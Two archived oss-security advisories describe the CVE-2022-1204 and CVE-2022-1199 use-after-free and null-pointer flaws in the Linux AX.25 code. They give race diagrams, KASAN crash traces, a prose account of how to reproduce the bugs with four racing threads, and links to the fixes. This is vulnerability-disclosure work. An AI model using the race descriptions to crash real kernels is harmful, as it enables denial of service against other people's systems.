A use-after-free flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 14:53:10 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1204: Linux kernel: UAF caused by binding operation when
 ax25 device is detaching

Hello there,

There are use-after-free vulnerabilities in net/ax25/af\_ax25.c of linux that allow 
attacker to crash linux kernel by simulating ax25 device from user space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The resources such as ax25\_dev and net\_device will be freed in ax25\_dev\_device\_down(),
if we call ax25\_bind() between ax25\_kill\_by\_device() and kfree() in ax25\_dev\_device\_down(),
we could use ax25\_dev in functions such as ax25\_bind() ax25\_release(), ax25\_connect(),
ax25\_ioctl(), ax25\_getname(), ax25\_sendmsg(), ax25\_getsockopt() and ax25\_info\_show() after
ax25\_dev has been deallocated, and use net\_device in functions such as ax25\_release(),
ax25\_sendmsg(), ax25\_getsockopt(), ax25\_getname() and ax25\_info\_show() after net\_device
has been deallocated.

One of the concurrency UAF related with ax25\_dev in ax25\_bind() can be shown as below:

       (USE)                  |     (FREE)
                              |  ax25\_device\_event
                              |    ax25\_dev\_device\_down
ax25\_bind                     |    ...
  ...                         |      kfree(ax25\_dev)
  ax25\_fillin\_cb()            |    ...
    ax25\_fillin\_cb\_from\_dev() |
  ...                         |

One of the concurrency UAF related with net\_device in ax25\_release() can be shown as below:

          (USE)                   |      (FREE)
                                  |  ax25\_kill\_by\_device()
    ax25\_bind()                   |
    ax25\_connect()                |    ...
                                  |  ax25\_dev\_device\_down()
                                  |    ...
                                  |    dev\_put\_track(dev, ...) //FREE
    ax25\_release()                |    ...
      ax25\_send\_control()         |
        alloc\_skb()      //USE    |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

(1) One of the use-after-free bug backtraces related with ax25\_dev is shown below.

\[  208.136725\] BUG: KASAN: use-after-free in ax25\_send\_control+0x3c/0x210
\[  208.136725\] Read of size 8 at addr ffff888007c4ad08 by task ax25\_co\_rel/3072
\[  208.136725\] Call Trace:
\[  208.136725\]  dump\_stack+0x7d/0xa3
\[  208.136725\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  kasan\_report.cold+0x7f/0x10e
\[  208.136725\]  ? \_raw\_write\_lock\_bh+0x80/0xd0
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_release+0x2db/0x3b0
\[  208.136725\]  \_\_sock\_release+0x6d/0x120
\[  208.136725\]  sock\_close+0xc/0x10
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  get\_signal+0xbae/0xc00
\[  208.136725\]  ? ax25\_connect+0x3c1/0x800
\[  208.136725\]  arch\_do\_signal\_or\_restart+0x1d9/0xc70
\[  208.136725\]  ? wait\_woken+0x110/0x110
\[  208.136725\]  ? selinux\_netlbl\_socket\_connect+0x26/0x30
\[  208.136725\]  ? kick\_process+0x12/0x80
\[  208.136725\]  ? task\_work\_add+0xcd/0xe0
\[  208.136725\]  ? restore\_sigcontext+0x320/0x320
\[  208.136725\]  ? \_\_sys\_connect+0x108/0x120
\[  208.136725\]  ? \_\_sys\_connect\_file+0xc0/0xc0
\[  208.136725\]  ? common\_nsleep+0x5a/0x70
\[  208.136725\]  ? copy\_init\_fpstate\_to\_fpregs+0x60/0x60
\[  208.136725\]  ? \_\_ia32\_sys\_clock\_adjtime+0x30/0x30
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0xaa/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] RIP: 0033:0x7fa754c17d2b
\[  208.136725\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 08 e8 31 fb ff ff 8b 44
\[  208.136725\] RSP: 002b:00007fa5dfd26ee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  208.136725\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fa754c17d2b
\[  208.136725\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  208.136725\] RBP: 00007fa5dfd26f00 R08: 0000000000000000 R09: 00007fa5dfd27700
\[  208.136725\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffc91618f7e
\[  208.136725\] R13: 00007ffc91618f7f R14: 00007fa5dfd26fc0 R15: 00007fa5dfd27700
\[  208.136725\] 
\[  208.136725\] Allocated by task 3070:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  \_\_\_\_kasan\_kmalloc.constprop.0+0x84/0xa0
\[  208.136725\]  ax25\_dev\_device\_up+0x27/0x1a0
\[  208.136725\]  ax25\_device\_event+0x12d/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  \_\_dev\_notify\_flags+0xbf/0x180
\[  208.136725\]  dev\_change\_flags+0x92/0xb0
\[  208.136725\]  devinet\_ioctl+0x92f/0xbd0
\[  208.136725\]  inet\_ioctl+0x259/0x290
\[  208.136725\]  sock\_do\_ioctl+0xa8/0x1e0
\[  208.136725\]  sock\_ioctl+0x2ee/0x3f0
\[  208.136725\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  208.136725\]  do\_syscall\_64+0x33/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] 
\[  208.136725\] Freed by task 3071:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  kasan\_set\_track+0x1c/0x30
\[  208.136725\]  kasan\_set\_free\_info+0x20/0x30
\[  208.136725\]  \_\_\_\_kasan\_slab\_free+0xec/0x120
\[  208.136725\]  kfree+0x8f/0x210
\[  208.136725\]  ax25\_device\_event+0x14e/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  dev\_close\_many+0x17d/0x230
\[  208.136725\]  rollback\_registered\_many+0x1f1/0x950
\[  208.136725\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.136725\]  unregister\_netdev+0x13/0x20
\[  208.136725\]  mkiss\_close+0xc4/0x120
\[  208.136725\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.136725\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.136725\]  tty\_release+0x200/0x670
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

(2) One of the use-after-free bug backtraces related with net\_device is shown below.

\[  769.959339\] BUG: KASAN: use-after-free in ax25\_send\_control+0x43/0x210
\[  769.959339\] Read of size 2 at addr ffff8880092520de by task ax25\_co\_rel/1970
\[  769.966904\] Call Trace:
\[  769.966904\]  <TASK>
\[  769.966904\]  dump\_stack\_lvl+0x57/0x7d
\[  769.966904\]  print\_address\_description.constprop.0+0x1f/0x150
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  kasan\_report.cold+0x7f/0x11b
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ax25\_release+0x2db/0x3b0
\[  769.966904\]  ? lock\_release+0xb2/0x470
\[  769.966904\]  \_\_sock\_release+0x6d/0x120
\[  769.966904\]  sock\_close+0xf/0x20
\[  769.966904\]  \_\_fput+0x11f/0x420
\[  769.966904\]  task\_work\_run+0x86/0xd0
\[  769.966904\]  get\_signal+0x1096/0x1240
\[  769.966904\]  ? lockdep\_hardirqs\_on\_prepare+0xe/0x230
\[  769.966904\]  ? \_\_local\_bh\_enable\_ip+0x7e/0xf0
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ? ax25\_connect+0x3c1/0x800
\[  769.966904\]  ? signal\_setup\_done+0x2a0/0x2a0
\[  769.966904\]  arch\_do\_signal\_or\_restart+0x1df/0xbf0
\[  770.012784\]  exit\_to\_user\_mode\_prepare+0x143/0x1c0
\[  770.012784\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.012784\]  do\_syscall\_64+0x48/0x90
\[  770.012784\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.012784\] RIP: 0033:0x7fba03510d2b
\[  770.012784\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44
\[  770.016580\] RSP: 002b:00007fb9a9f5aee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  770.016580\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fba03510d2b
\[  770.021380\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  770.021380\] RBP: 00007fb9a9f5af00 R08: 0000000000000000 R09: 00007fb9a9f5b700
\[  770.021380\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffeb426b5ce
\[  770.021380\] R13: 00007ffeb426b5cf R14: 00007fb9a9f5afc0 R15: 00007fb9a9f5b700
\[  770.021380\]  </TASK>
\[  770.021380\] 
\[  770.021380\] Allocated by task 1283:
\[  770.025691\]  kasan\_save\_stack+0x1e/0x40
\[  770.025691\]  \_\_kasan\_kmalloc+0x81/0xa0
\[  770.025691\]  alloc\_netdev\_mqs+0x5a/0x680
\[  770.025691\]  mkiss\_open+0x6c/0x380
\[  770.025691\]  tty\_ldisc\_open+0x55/0x90
\[  770.029456\]  tty\_set\_ldisc+0x193/0x2e0
\[  770.029456\]  tty\_ioctl+0x4ae/0xc70
\[  770.029456\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  770.029456\]  do\_syscall\_64+0x3b/0x90
\[  770.029456\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.029456\] 
\[  770.033625\] Freed by task 1969:
\[  770.033625\]  kasan\_save\_stack+0x1e/0x40
\[  770.033625\]  kasan\_set\_track+0x21/0x30
\[  770.033625\]  kasan\_set\_free\_info+0x20/0x30
\[  770.033625\]  \_\_kasan\_slab\_free+0xfa/0x130
\[  770.033625\]  kfree+0xa3/0x2c0
\[  770.033625\]  device\_release+0x54/0xe0
\[  770.037210\]  kobject\_put+0xa5/0x120
\[  770.037210\]  tty\_ldisc\_kill+0x3e/0x80
\[  770.037210\]  tty\_ldisc\_hangup+0x1b2/0x2c0
\[  770.037210\]  \_\_tty\_hangup.part.0+0x316/0x520
\[  770.037210\]  tty\_release+0x200/0x670
\[  770.037210\]  \_\_fput+0x11f/0x420
\[  770.037210\]  task\_work\_run+0x86/0xd0
\[  770.037210\]  exit\_to\_user\_mode\_prepare+0x1b2/0x1c0
\[  770.037210\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.041472\]  do\_syscall\_64+0x48/0x90
\[  770.041472\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Reproduce  =\*=\*=\*=\*=\*=\*=\*=\*=

We could use pseudoterminal-based device emulation to simulate
ax25 device from user space and create a socket for it. Then, 
we create four threads: the first thread is used to initialize 
and start ax25 device, the second thread is used to close the
pseudoterminal-based device, the third thread is used to execute
bind and connect syscalls, the last thread is used to close the 
socket. Let these four threads to interleave, we could reproduce
the bug. 

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/d01ffb9eee4af165d83b08dd73ebdf9fe94a519b
https://github.com/torvalds/linux/commit/87563a043cef044fed5db7967a75741cc16ad2b1
https://github.com/torvalds/linux/commit/feef318c855a361a1eccd880f33e88c460eb63b4
https://github.com/torvalds/linux/commit/9fd75b66b8f68498454d685dc4ba13192ae069b0
https://github.com/torvalds/linux/commit/5352a761308397a0e6250fdc629bb3f615b94747

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-01-28: commit d01ffb9eee4a accepted to mainline kernel
2022-02-04: commit 87563a043cef accepted to mainline kernel
2022-01-28: commit feef318c855a accepted to mainline kernel
2022-03-21: commit 9fd75b66b8f6 accepted to mainline kernel
2022-03-29: commit 5352a7613083 accepted to mainline kernel
2022-04-02: CVE-2022-1204 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=
Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1204: security - CVE-2022-1204: Linux kernel: UAF caused by binding operation when ax25 device is detaching

A flaw was found in the Linux kernel. This flaw allows an attacker to crash the Linux kernel by simulating amateur radio from the user space, resulting in a null-ptr-deref vulnerability and a use-after-free vulnerability.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 16:45:07 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1199 kernel: Null pointer dereference and use-after-free
 in ax25\_release()

Hello there,

There are null-ptr-deref vulnerability and use-after-free vulnerabilities in net/ax25/af\_ax25.c
of linux that allow attacker to crash linux kernel by simulating ax25 device from user-space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The null-ptr-deref vulnerability is caused by "ax25->sk = NULL" in ax25\_release(). 
The dereference sites include "bh\_lock\_sock(ax25->sk)" and "bh\_unlock\_sock(ax25->sk)"
in ax25\_disconnect(), "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device(). 

The NPD bug related with bh\_lock\_sock(ax25->sk) is shown below:

ax25\_kill\_by\_device()                | ax25\_release()
  ax25\_disconnect()                  |   ax25\_destroy\_socket()
    ...                              |
    if(ax25->sk != NULL)             |     ...
      ...                            |     ax25->sk = NULL;
      bh\_lock\_sock(ax25->sk); //(1)  |     ...
      ...                            |
      bh\_unlock\_sock(ax25->sk); //(2)|

The NPD bug related with lock\_sock(s->sk) is shown below:

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
                             |     ax25\_cb\_del()
  ...                        |     ...
                             |     ax25->sk=NULL;
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |     ...
  release\_sock(s->sk); //(2) |
  ...                        |

The use-after-free vulnerability is caused by "sock\_put(sk)" in ax25\_release(). The dereference 
sites include "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device().

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
  ...                        |   ...
                             |   sock\_put(sk); //FREE
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |   ...
  release\_sock(s->sk); //(2) |
  ...                        |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

The NPD bug related with bh\_lock\_sock() is shown below.

\[  178.776298\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  178.777929\] RIP: 0010:\_raw\_spin\_lock+0x7e/0xd0
\[  178.777929\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 2a 29 e8 fe be 04 00 00 00 48 8d 7c 24 20 e8 1b 29 e8 fe ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  178.777929\] RSP: 0018:ffff888007dcfa48 EFLAGS: 00000297
\[  178.777929\] RAX: 0000000000000000 RBX: 1ffff11000fb9f49 RCX: ffffffff82482855
\[  178.777929\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff888007dcfa68
\[  178.777929\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  178.777929\] R10: ffffed1000fb9f4d R11: 0000000000000001 R12: 0000000000000065
\[  178.777929\] R13: ffff888009f99800 R14: ffff888009f99860 R15: ffff888009f99800
\[  178.777929\] FS:  00007f9651ce3700(0000) GS:ffff88806d480000(0000) knlGS:0000000000000000
\[  178.777929\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  178.777929\] CR2: 0000000000000088 CR3: 0000000009876000 CR4: 00000000000006e0
\[  178.777929\] Call Trace:
\[  178.777929\]  ? \_raw\_read\_lock\_irq+0x30/0x30
\[  178.777929\]  ? \_raw\_spin\_unlock\_bh+0x9/0x20
\[  178.777929\]  ? ax25\_link\_failed+0x40/0x60
\[  178.777929\]  ax25\_disconnect+0xf6/0x220
\[  178.777929\]  ax25\_device\_event+0x187/0x250
\[  178.777929\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  178.777929\]  dev\_close\_many+0x17d/0x230
\[  178.777929\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  178.777929\]  rollback\_registered\_many+0x1f1/0x950
\[  178.777929\]  ? \_raw\_write\_lock\_irqsave+0xd0/0xd0
\[  178.777929\]  ? dev\_alloc\_name+0xd0/0xd0
\[  178.777929\]  ? ldsem\_down\_read+0x410/0x410
\[  178.777929\]  unregister\_netdevice\_queue+0x133/0x200
\[  178.777929\]  ? unregister\_netdevice\_many+0x20/0x20
\[  178.777929\]  ? sixpack\_close+0xf8/0x130
\[  178.777929\]  unregister\_netdev+0x13/0x20
\[  178.777929\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  178.777929\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  178.777929\]  tty\_release+0x200/0x670
\[  178.777929\]  \_\_fput+0x104/0x3b0
\[  178.777929\]  task\_work\_run+0x8f/0xd0
\[  178.777929\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  178.777929\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  178.777929\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

The NPD bug related with lock\_sock() is shown below.

\[  727.493561\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  727.493561\] RIP: 0010:\_raw\_spin\_lock\_bh+0x89/0xd0
\[  727.493561\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 5f c6 f1 fd be 04 00 00 00 48 8d 7c 24 20 e8 50 c6 f1 fd ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  727.493561\] RSP: 0018:ffff88801569f9c0 EFLAGS: 00000297
\[  727.493561\] RAX: 0000000000000000 RBX: 1ffff11002ad3f38 RCX: ffffffff8366d960
\[  727.493561\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88801569f9e0
\[  727.493561\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  727.493561\] R10: ffffed1002ad3f3c R11: 0000000000000001 R12: 0000000000000088
\[  727.493561\] R13: ffff888016166700 R14: ffff888014a57dc8 R15: dffffc0000000000
\[  727.493561\] FS:  00007f5cab712700(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
\[  727.493561\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  727.493561\] CR2: 0000000000000088 CR3: 000000000a336000 CR4: 00000000000006f0
\[  727.493561\] Call Trace:
\[  727.493561\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  727.493561\]  release\_sock+0x16/0x170
\[  727.493561\]  ax25\_device\_event+0x1a3/0x270
\[  727.493561\]  ? nr\_device\_event+0xf2/0x140
\[  727.493561\]  raw\_notifier\_call\_chain+0x8d/0xd0
\[  727.493561\]  dev\_close\_many+0x227/0x400
\[  727.493561\]  ? \_\_dev\_close\_many+0x290/0x290
\[  727.493561\]  ? finish\_task\_switch.isra.0+0x205/0x620
\[  727.493561\]  ? \_\_switch\_to+0x572/0xe50
\[  727.493561\]  rollback\_registered\_many+0x2e1/0x1130
\[  727.493561\]  ? dev\_alloc\_name+0xf0/0xf0
\[  727.493561\]  ? ldsem\_down\_read+0x650/0x650
\[  727.493561\]  unregister\_netdevice\_queue+0x1d7/0x3e0
\[  727.493561\]  ? unregister\_netdevice\_many+0x50/0x50
\[  727.493561\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  727.493561\]  ? down\_write\_killable+0x120/0x120
\[  727.493561\]  unregister\_netdev+0x13/0x20
\[  727.493561\]  mkiss\_close+0x116/0x1f0
\[  727.493561\]  tty\_ldisc\_hangup+0x227/0x5f0
\[  727.493561\]  ? fasync\_remove\_entry+0x28/0x220
\[  727.493561\]  \_\_tty\_hangup.part.0+0x41c/0x910
\[  727.493561\]  tty\_release+0x3a8/0xcc0
\[  727.493561\]  \_\_fput+0x1e2/0x840
\[  727.493561\]  task\_work\_run+0xe8/0x180
\[  727.493561\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  727.493561\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  727.493561\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  727.493561\] RIP: 0033:0x7f6d2c9d4beb
\[  727.493561\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44
\[  727.493561\] RSP: 002b:00007f5cab711ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  727.493561\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f6d2c9d4beb
\[  727.493561\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  727.493561\] RBP: 00007f5cab711f00 R08: 0000000000000000 R09: 00007f5cab712700
\[  727.493561\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffee89407be
\[  727.493561\] R13: 00007ffee89407bf R14: 00007f5cab711fc0 R15: 00007f5cab712700

The UAF bug related with lock\_sock() is shown below.

\[  208.472360\] BUG: KASAN: use-after-free in \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\] Write of size 4 at addr ffff88800a0e8088 by task ax25\_clo\_bin/1271
\[  208.472465\] Call Trace:
\[  208.472465\]  dump\_stack+0x7d/0xa3
\[  208.472465\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  kasan\_report.cold+0x7f/0x10e
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  check\_memory\_region+0xf9/0x1e0
\[  208.472465\]  \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? schedule+0x8e/0x120
\[  208.472465\]  \_\_lock\_sock+0xd9/0x140
\[  208.472465\]  ? sock\_omalloc+0xc0/0xc0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? wait\_woken+0x110/0x110
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x80/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  lock\_sock\_nested+0x72/0x80
\[  208.472465\]  ax25\_device\_event+0xef/0x160
\[  208.472465\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.472465\]  dev\_close\_many+0x17d/0x230
\[  208.472465\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  208.472465\]  ? \_\_schedule+0x494/0xc30
\[  208.472465\]  rollback\_registered\_many+0x1f1/0x950
\[  208.472465\]  ? clockevents\_program\_event+0xd3/0x130
\[  208.472465\]  ? dev\_alloc\_name+0xd0/0xd0
\[  208.472465\]  ? ldsem\_down\_read+0x410/0x410
\[  208.472465\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.472465\]  ? unregister\_netdevice\_many+0x20/0x20
\[  208.472465\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  208.472465\]  unregister\_netdev+0x13/0x20
\[  208.472465\]  mkiss\_close+0xc4/0x120
\[  208.472465\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.472465\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.472465\]  tty\_release+0x200/0x670
\[  208.472465\]  \_\_fput+0x104/0x3b0
\[  208.472465\]  task\_work\_run+0x8f/0xd0
\[  208.472465\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.472465\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.472465\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.472465\] RIP: 0033:0x7f7900bb1beb
\[  208.472465\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 0c e8 71 fc ff ff 8b 44
\[  208.472465\] RSP: 002b:00007f78ff9c8ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  208.472465\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f7900bb1beb
\[  208.472465\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  208.472465\] RBP: 00007f78ff9c8f00 R08: 0000000000000000 R09: 00007f78ff9c9700
\[  208.472465\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd364d6b9e
\[  208.472465\] R13: 00007ffd364d6b9f R14: 00007f78ff9c8fc0 R15: 00007f78ff9c9700

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/4e0f718daf97d47cf7dec122da1be970f145c809
https://github.com/torvalds/linux/commit/7ec02f5ac8a5be5a3f20611731243dc5e1d9ba10
https://github.com/torvalds/linux/commit/71171ac8eb34ce7fe6b3267dce27c313ab3cb3ac

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

